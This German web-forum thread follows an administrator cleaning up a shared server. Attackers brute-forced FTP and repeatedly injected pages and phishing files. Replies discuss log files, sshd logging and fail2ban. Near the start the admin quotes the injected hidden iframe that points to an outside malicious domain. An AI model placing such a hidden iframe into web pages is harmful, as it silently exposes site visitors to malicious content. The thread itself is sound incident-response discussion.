nicht angemeldet
SICHERHEIT: Als attackierend gemedet
Der MartinHello,
wer kann mich mal umfassend aufklären?
Bei einem Server, der für unterschiedliche Domains genutzt wird, haben wir bei einer Domain Ärger mit "merkwürdigen Erscheinungen".
Es dauert keine fünf Minuten, dann werden Seiten verändert, indem z.B. eine Zeile Code eingefügt wird:
<iframe src="http://zymkasi.com/?click=87C13C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Der Aufruf der Seite http://zymkasi.com/ führt zu obigem Warnhinweis.
Kommt der nun aus meinem Firefox?
Was wollen diese Leute?
Wie kommen die ins System?
Alle anderen Domains auf der Maschine sind bisher nicht angegriffen worden.
Das iFrame stammmt nicht von uns und auch nicht vom Kunden.
Ich habe nun den Auftrag, das zu untersuchen und suche nach ähnlichen Erfahrungen.
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Guten Tag,
Bei einem Server, der für unterschiedliche Domains genutzt wird, haben wir bei einer Domain Ärger mit "merkwürdigen Erscheinungen".
Link?
Es dauert keine fünf Minuten, dann werden Seiten verändert, indem z.B. eine Zeile Code eingefügt wird:
<iframe src="http://zymkasi.com/?click=87C13C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Link?
Was wollen diese Leute?
iframes unterbringen.
Wie kommen die ins System?
Vielleicht per FTP? Oder über ein unsicheres (PHP-)Skript?
Alle anderen Domains auf der Maschine sind bisher nicht angegriffen worden.
Das muss ja nichts heißen.
Das iFrame stammmt nicht von uns und auch nicht vom Kunden.
Könnte automatisch eingefügt worden sein. Ist denn der iframe immer an der gleichen Stelle im Quelltext? Wann wurden die Dateien auf dem Server das letzte Mal verändert?
Ich habe nun den Auftrag, das zu untersuchen und suche nach ähnlichen Erfahrungen.
Ist vielleicht jemand in einen schreibberechtigten Account auf dem Server eingebrochen?
Gruß
Christoph Jeschke--
Zend Certified Engineer
Certified Urchin Admin
Selfcode: sh:( fo:) ch:? rl:? br:& n4:( ie:( mo:) va:} de:] zu:$ fl:( ss:} ls:& ja:|-
Hello,
Wie kommen die ins System?
Vielleicht per FTP? Oder über ein unsicheres (PHP-)Skript?
sieht so aus, dass die über FTP kommen und dort brute-force gefahren haben.
Es sind etliche 1000 Loginversuche per FTP im Sekundenabstand registriert.die IPs lauten
- 41.249.35.163
- 41.249.54.67
- 196.217.47.159
- 196.217.57.136
- 196.217.43.140
usw.
Also wird FTP jetzt erstmal abgeschaltet.
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
- 41.249.35.163
- 41.249.54.67
- 196.217.47.159
- 196.217.57.136
- 196.217.43.140
Alle kommen aus Marokko, da haste wohl Freunde was ;)
-
-
Der Aufruf der Seite http://zymkasi.com/ führt zu obigem Warnhinweis.
Kommt der nun aus meinem Firefox?Die fehlermeldung wird von Goggle (wenn Google-Toolbar installiert ist) ausgegeben. hatte vor kurzem das selbe Problem. Wenn die Seite bereinigt ist, kannst Du über das Google Webmastertool eine Freischaltung anfordern. Übrigens, versuch mal Deine Seite über einen Google Suchbegriff zu betreten, dann kommt man gar nicht auf die Seite
Gruß
Dynamite-
habe d'ehre
Der Aufruf der Seite http://zymkasi.com/ führt zu obigem Warnhinweis.
Wenn die Seite bereinigt ist, kannst Du über das Google Webmastertool eine Freischaltung anfordern.Ich bin abgeneigt zu glauben, dass dies seine Intention ist.
man liest sich
Wilhelm-
Hello,
Der Aufruf der Seite http://zymkasi.com/ führt zu obigem Warnhinweis.
Wenn die Seite bereinigt ist, kannst Du über das Google Webmastertool eine Freischaltung anfordern.Ich bin abgeneigt zu glauben, dass dies seine Intention ist.
Das glaube ich auch nicht.
Wir hatten den Rotz gerade gelöscht und die Originale wieder hochgeladen, da waren die Jungs schon wieder drauf. Hier ein Ausschnitt aus der wtmp:
username ftpd23588 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23587 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23586 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23585 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23584 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23583 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23582 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23581 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23580 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23579 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23578 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23577 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23576 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23575 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23574 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163
username ftpd23573 Thu Jul 23 12:38 - 12:38 (00:00) 41.249.35.163Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Guten Tag,
Wir hatten den Rotz gerade gelöscht und die Originale wieder hochgeladen, da waren die Jungs schon wieder drauf.
Und haben wieder etwas geändert?
Gruß
Christoph Jeschke--
Zend Certified Engineer
Certified Urchin Admin
Selfcode: sh:( fo:) ch:? rl:? br:& n4:( ie:( mo:) va:} de:] zu:$ fl:( ss:} ls:& ja:|-
Hello,
Wir hatten den Rotz gerade gelöscht und die Originale wieder hochgeladen, da waren die Jungs schon wieder drauf.
Und haben wieder etwas geändert?
Ja, haben lauter Phishing-Dateien eingepielt und Scripte geändert.
Das ging so schnell, dass man kaum noch Piep sagen konnte.Seit der FTP-Server ausgeschaltet ist, ist aber erstmal Ruhe.
Nun wundert mich nur, dass der Befehl lastb nichts liefert, obwohl doch diverse Fehlversuche mit FTP-Login dagewesen sind.Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Guten Tag,
Ja, haben lauter Phishing-Dateien eingepielt und Scripte geändert.
Das ging so schnell, dass man kaum noch Piep sagen konnte.Ärgerlich.
Seit der FTP-Server ausgeschaltet ist, ist aber erstmal Ruhe.
Das ist wohl eher kein FTP-Problem, sondern ein Schwaches-Passwort-Problem. Du solltest mal alle Accounts auf dem System prüfen und jeden User zwingen, ein neues Passwort zu vergeben - welches du mit der cracklib prüfen solltest.
Nun wundert mich nur, dass der Befehl lastb nichts liefert, obwohl doch diverse Fehlversuche mit FTP-Login dagewesen sind.
Hatten denn die Angreifer Zugriff auf die btmp? Was für ein OS? In Fedora werden wohl gar keine Zugriffe mehr aufgezeichnet (bzw. an anderer Stelle).
Gruß
Christoph Jeschke--
Zend Certified Engineer
Certified Urchin Admin
Selfcode: sh:( fo:) ch:? rl:? br:& n4:( ie:( mo:) va:} de:] zu:$ fl:( ss:} ls:& ja:|-
Hello,
Der Kollege, der das Passwort vergeben hat, hatte schon sinnvoll nachgedacht...
Es ist noch nicht geklärt, wie die überhaupt an den Accountnamen gekommen sind. Man will da ja auch keine falschen Anschuldigungen z.B. in Richtung ehemaliger Mitarbeiter machen.Nun wundert mich nur, dass der Befehl lastb nichts liefert, obwohl doch diverse Fehlversuche mit FTP-Login dagewesen sind.
Hatten denn die Angreifer Zugriff auf die btmp? Was für ein OS? In Fedora werden wohl gar keine Zugriffe mehr aufgezeichnet (bzw. an anderer Stelle).
Das ist ein generelles Problem, dass die btmp nicht gefüllt wird. Scheint irgendwie deaktiviert zu sein eben aus Sicherheitserwägungen, weil sich dort sonst Usernamen- und Passwörterfragmente von Fehlversuchen (also nur mit Vertipper) finden könnten. Soweit meine Recherche über Google & Co.
Es geht weder bei Debian 4.0 noch bei der betroffenen openSUSE 10.3 (2.6.22.17-0.1-default)
Eine lauffähige Fedora habe ich leider im Moment nicht zum Testen.
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Hello,
Zum Aussperren von BruteForce-IPs soll es Tool geben.
Kennt jemand das Tool oder hat es im Einsatz?http://raphael.kallensee.name/journal/fail2ban-abwehren-von-brute-force-attacken/
Allerdings würde ich dann auch gerne wissen, woher dieses Tool seine Erkenntnise zieht.
Wenn ich das richtig verstehe, sind das nur die Logdateien aus der Konfiguration?Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Hello,
so, das wird wohl wieder ein Self Join Thread hier :-)
Aber den Fortschritt wollte ich nicht vorenthalten.
Den SSHd habe ich nun zum Loggen von Fehlversuchen bringen können:Logging
obsoletes QuietMode and FascistLogging
SyslogFacility AUTH
LogLevel INFODie beiden unteren Zeilen waren auskommentiert.
Nun landen Fehlversuche von SSH in der Datei btmp.
Und da sind keinesfalls Fragmente von Passwörtern dabei!Dann werde ich mich mal mit dem Tool fail2ban beschäftigen.
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
-
-
-
-
-
-
Der Aufruf der Seite http://zymkasi.com/ führt zu obigem Warnhinweis.
Kommt der nun aus meinem Firefox?Die fehlermeldung wird von Goggle (wenn Google-Toolbar installiert ist) ausgegeben.
Das kommt auch ohne google toolbar von dem im Firefox verbauten google-Telefon. Wenn man das nicht abschaltet werden durch den FF alle aufgerufene urls mit einer google-Datenbank abgeglichen ob davon eine Gefahr ausgeht.
-
Hello,
Der Aufruf der Seite http://zymkasi.com/ führt zu obigem Warnhinweis.
Kommt der nun aus meinem Firefox?Die fehlermeldung wird von Goggle (wenn Google-Toolbar installiert ist) ausgegeben.
Das kommt auch ohne google toolbar von dem im Firefox verbauten google-Telefon. Wenn man das nicht abschaltet werden durch den FF alle aufgerufene urls mit einer google-Datenbank abgeglichen ob davon eine Gefahr ausgeht.
meinst Du dieses Feature?
http://www.heise.de/newsticker/Firefox-sendet-wie-Chrome-Daten-an-Google-Update--/meldung/115857Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Hallo,
Das kommt auch ohne google toolbar von dem im Firefox verbauten google-Telefon. Wenn man das nicht abschaltet werden durch den FF alle aufgerufene urls mit einer google-Datenbank abgeglichen ob davon eine Gefahr ausgeht.
meinst Du dieses Feature?
http://www.heise.de/newsticker/Firefox-sendet-wie-Chrome-Daten-an-Google-Update--/meldung/115857vermutlich meint er das. Wobei "gelegentlich" wohl ein sehr dehnbarer Begriff ist:
"Statt dessen lädt er [Firefox] gelegentlich eine Liste von bekanntermaßen bösartigen URLs von Google auf den PC herunter."
Mein neu installierter FF 3.011 tat das laut LiveHTTP-Extension ungefähr im Minutentakt (auch wenn ich gar nichts mit dem FF gemacht habe), bis ich den Unsinn endlich abgestellt habe. Ist das noch "gelegentlich"?
So long,
Martin--
Um die Wahrheit zu erfahren, muss man den Menschen widersprechen.
(George Bernhard Shaw)-
Hello,
Mein neu installierter FF 3.011 tat das laut LiveHTTP-Extension ungefähr im Minutentakt (auch wenn ich gar nichts mit dem FF gemacht habe), bis ich den Unsinn endlich abgestellt habe. Ist das noch "gelegentlich"?
Die allgemeine Überwachung der User wächst von Tag zu Tag. Und weil es keiner so genau weiß, was da passiert, wird das immer "geschäftsüblicher". Wenn dann doch mal jemand dagegen angeht, ist ja schon laaange Stand der technik und ganz normal[tm]...
Ein Schelm, der Böses dabei denkt.
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Und weil es keiner so genau weiß, was da passiert, wird das immer "geschäftsüblicher". Wenn dann doch mal jemand dagegen angeht, ist ja schon laaange Stand der technik und ganz normal[tm]...
Und die Informationspolitik setzt sich auf dieser "Warnseite" fort. Woran soll man erkennen, wer diesen Inhalt auf den Monitor zaubert? Angaben dazu gibt es nicht und der Link verweißt auf Erklärungen zum "warum" bei google obwohl man die Seite ggf. nicht über google aufgerufen hat.
-
-
-
Der Aufruf der Seite http://zymkasi.com/ führt zu obigem Warnhinweis.
Kommt der nun aus meinem Firefox?Die fehlermeldung wird von Goggle (wenn Google-Toolbar installiert ist) ausgegeben.
Das kommt auch ohne google toolbar von dem im Firefox verbauten google-Telefon. Wenn man das nicht abschaltet werden durch den FF alle aufgerufene urls mit einer google-Datenbank abgeglichen ob davon eine Gefahr ausgeht.
meinst Du dieses Feature?
http://www.heise.de/newsticker/Firefox-sendet-wie-Chrome-Daten-an-Google-Update--/meldung/115857Ja. Da wird wohl auch weitgehend nur mit dem hash einer url gearbeitet aber eben nur solange das eindeutig bleibt - habe ich mal gelesen. Und wenn es eindeutig bleiben soll, dann existiert in irgendeiner Datenbank zu dem hash natürlich auch die url im Klartext.
-
-
-
-
Hello,
man last,lastb enthält u. a. diese Beschreibung:
Lastb is the same as last, except that by default it shows a log of the
file /var/log/btmp, which contains all the bad login attempts.Nun müsste doch in /var/log/btmp etwas drinstehen, wenn fehlgeschlagene Anmeldeversuche stattgefunden haben, oder verstehe ich das falsch?
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Moin!
man last,lastb enthält u. a. diese Beschreibung:
Lastb is the same as last, except that by default it shows a log of the
file /var/log/btmp, which contains all the bad login attempts.Nun müsste doch in /var/log/btmp etwas drinstehen, wenn fehlgeschlagene Anmeldeversuche stattgefunden haben, oder verstehe ich das falsch?
Anmeldeversuche auf der Shell, also via Telnet oder SSH. Die Datei muss aber nicht existieren - wenn Fehlschläge nicht geloggt werden, findest du nichts.
- Sven Rautenberg
-
Hello,
man last,lastb enthält u. a. diese Beschreibung:
Lastb is the same as last, except that by default it shows a log of the
file /var/log/btmp, which contains all the bad login attempts.Nun müsste doch in /var/log/btmp etwas drinstehen, wenn fehlgeschlagene Anmeldeversuche stattgefunden haben, oder verstehe ich das falsch?
Anmeldeversuche auf der Shell, also via Telnet oder SSH. Die Datei muss aber nicht existieren - wenn Fehlschläge nicht geloggt werden, findest du nichts.
Anmeldeversuche von SSH werden jetzt gelogged. Siehe
https://forum.selfhtml.org/?t=189128&m=1260056Dazu muss btmp angelegt sein. Das alleine hat aber nicht geholfen, sondern erst die Änderungen in der sshd_config
Wie und wo bekomme ich Fehlversuche des proftpd gelogged?
Das habe ich nch nicht herausgefunden bisher.Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Hallo Tom,
Wie und wo bekomme ich Fehlversuche des proftpd gelogged?
ähnlich dem Apachen, musst Du dafür selbst sorgen: http://www.proftpd.de/HowTo-Logging.31.0.html
Dabei findet keine Erfassung auf Systemebene statt, als dass Fehlschläge sich dort niederschlagen würden.Gruß aus Berlin!
eddi--
Sich einem Ziel zu verschreiben, sollte ein Prüfen der damit verbundenen Intension und ein Überprüfen der einzusetzenden Mittel vorangehen, sonst türmen sich immer wieder Wolkenschlösser auf, von denen aus zwar herabgesehen wird. Die aber mit einem Blick auf die Basis zerfallen.-
Hello Eddi,
Wie und wo bekomme ich Fehlversuche des proftpd gelogged?
ähnlich dem Apachen, musst Du dafür selbst sorgen: http://www.proftpd.de/HowTo-Logging.31.0.html
Dabei findet keine Erfassung auf Systemebene statt, als dass Fehlschläge sich dort niederschlagen würden.Danke Dir, das hilft mir weiter, sollten wir den Proftpd doch wieder einschalten. Im Zusammenspiel mit fail2ban, einer Mindestlänge für Passworte sowie regelmäßigem Wechsel scheint mir das dann doch wieder möglich.
Wir sind uns inzwischen relativ sicher, dass die Hacker aus dem Umfeld des Kunden kommen müssen, also aus seiner Firma. Der Account-Name wurde massiv benutzt, das Passwort wurde experimentell ermittelt. Woher sollten echte Hacker den Namen so zielstrebig gewusst haben? Und als wir der Firma mitgeteilt haben, dass nun ein spezielles Logging stattfinden würde, war ein paar Stunden später schlagartig Schluss mit den Angriffen.
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
Hello,
noch eine Frage zur rechtlichen Wertung:
Ist ein solcher Angriff auf die Datentechnik eines Anderen nun eigentloich ein Offizialdelikt oder handelt es sich noch um ein Antragsdelikt?
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg
-
-
-
-
-
-
-
Hello,
ich suche ein umfassendes Manual für syslog und syslog-ng und ähnlichen Diesnten und wie man ein vernünftiges, skalierbares und vor allem benutztbares Logging für ALLE auf dem Host laufenden Dienste und Aktionen aufbauen kann.
Ein paar Dutzend, die hier ein bisschen und dort ein bisschen (abgeschrieben) beschreiben, habe ich gefunden, aber so richtig zusammenpassen wollen die auch nicht.
Was muss beachtet werden?
- ftp
- ssh
- login
- shells
- cron
- usw...
wo loggen die out-of-the-box? Das ist ja leider von Distribution zu Distribution auch unterschiedlich. Wo stellt man den Loglevel ein? Welche Einrichtungen fummeln dazwischen (z.B. PAM).
Am besten mal mit einer sauberen grafischen Darstellung. Gibt es die überhaupt irgendwo?
Ich weiß schon, warum ich ein System möglichst lange laufen lasse. Nach jedem Upgrade muss man erstmal wieder suchen, was alles geändert worden ist. Das ist SCH....!
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg